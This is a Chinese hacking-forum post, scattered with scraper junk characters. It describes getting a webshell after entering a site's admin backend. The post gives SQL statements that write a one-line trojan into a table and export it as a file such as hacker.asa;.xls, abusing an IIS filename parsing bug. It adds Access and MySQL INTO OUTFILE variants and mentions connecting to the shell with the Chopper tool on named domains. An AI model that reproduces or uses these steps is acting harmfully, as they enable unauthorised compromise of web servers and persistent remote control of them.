好不容易进了后台,发现啥上传啊。备份啊多木有。
& u; K: N8 Z# M% }webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
3 y a. ~" ]* Z# M: E/ _4 z5 Y文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
_+ E* b( l; I$ J然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
2 D3 ?8 f2 ~, i% X$ {1.create table cmd (a varchar(50))
+ G& \, S$ _2 d3 I' Y4 g8 c) @( D2.insert into cmd (a) values (‘‘)5 w" Z8 q2 x! I
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd0 m8 V3 `( Y7 ~) d& o" q- V
(把表cmd的内容导出为物理路径的一个EXCEL文件)' [, k9 x( A3 r( X9 K2 [, W# M
4.drop table cmd
4 \( O3 q4 b# {利用IIS的BUG成功拿到了WEBSHELL。. F: n9 v. j& R E
I. p/ m' I. t4 R4 ]
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话! m/ X) w; t5 N
6 [9 H$ t9 D: K, H
SQL语句意思解释:1 l. v$ Z0 |# e
第一句
+ o/ i1 Y7 J) O8 q 建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
2 s/ [8 C# P/ ?( j4 v4 E+ d3 t8 _( J0 T' _7 j4 N
第二句; o$ L! r1 i% A( [" H! ?3 P) A8 F' o
在表cmd的a字段插入一句话木马
8 }% H8 V8 y' O3 K9 H 第三句) m w. q" C, g2 `
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
. \! @6 Z7 s4 W
9 |) l" q# E) T% {" c1 l 第四句! \; h" g: p& q4 V5 D4 \% P( g
删除建立的cmd表
. i( S# r0 ~5 m4 V9 ]' W4 Y
8 X& K$ V. h: J# Q% W. E& a 以下内容为测试:
0 |- D/ Y9 k0 H/ } Access利用后台SQL执行命令功能导出WebShell:2 k( D) F" i; o; V: V
这个更简单:0 y& i; d# S: C) @9 ^, m
[ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
# }( t$ E1 {4 p* V& U 或者! w$ I5 v5 b' T( L4 a
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]1 ?. x8 H, g0 ?, @- d$ J3 G
c& Y0 n5 d% S$ Z
后台有执行SQL语句功能(vote为已知表段)
9 M, Q8 \' M/ f2 q' \6 m0 `7 V. a 希望对大家有所帮助拿shell的又一个思路
2 W; B' [" ?% w+ o0 D |